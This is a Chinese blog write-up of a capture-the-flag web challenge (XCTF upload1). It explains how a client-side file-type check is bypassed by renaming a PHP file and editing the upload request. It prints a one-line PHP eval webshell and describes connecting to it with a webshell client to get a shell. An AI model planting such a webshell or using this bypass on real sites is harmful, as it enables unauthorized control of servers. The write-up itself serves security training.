攻防世界upload1(web)_sean7777777的博客-爱代码爱编程
XCTF-upload1
知识点
题目比较简单,本题知识点
- 文件上传漏洞
- 前端绕过
- 一句话木马getshell
打开网址,直接是文件上传,首先随便上传一个小图片,
上传图片后,发现上传成功,并且成功爆出了路径,打开图片。
打开后发现就是刚才上传的图片。
现在的思路就比较清晰了,上传一个一句话木马,getshell即可。
一句话木马
<?php @eval($_POST['cmd']);?>
其中cmd为木马的密码
尝试上传yijuhua.php,发现文件格式只能是图片,抓包绕过即可。
打开burp后,抓包,发现php依然无法从浏览器发送到burp上,说明是前端校验,直接改写文件格式即可。
上传绕过
首先将yijuhua.php修改文yijuhua.jpg然后抓包,在包中修改文件名称,如下图
可以看到,已经成功绕过。
打开php看看是否已被当做代码执行。
仪剑链接
打开后,发现页面返回值为空,可以基本确定一句话木马执行成功,直接用仪剑连接。
测试下连接,发现成功,直接连接,getshell。
在html文件夹下发现flag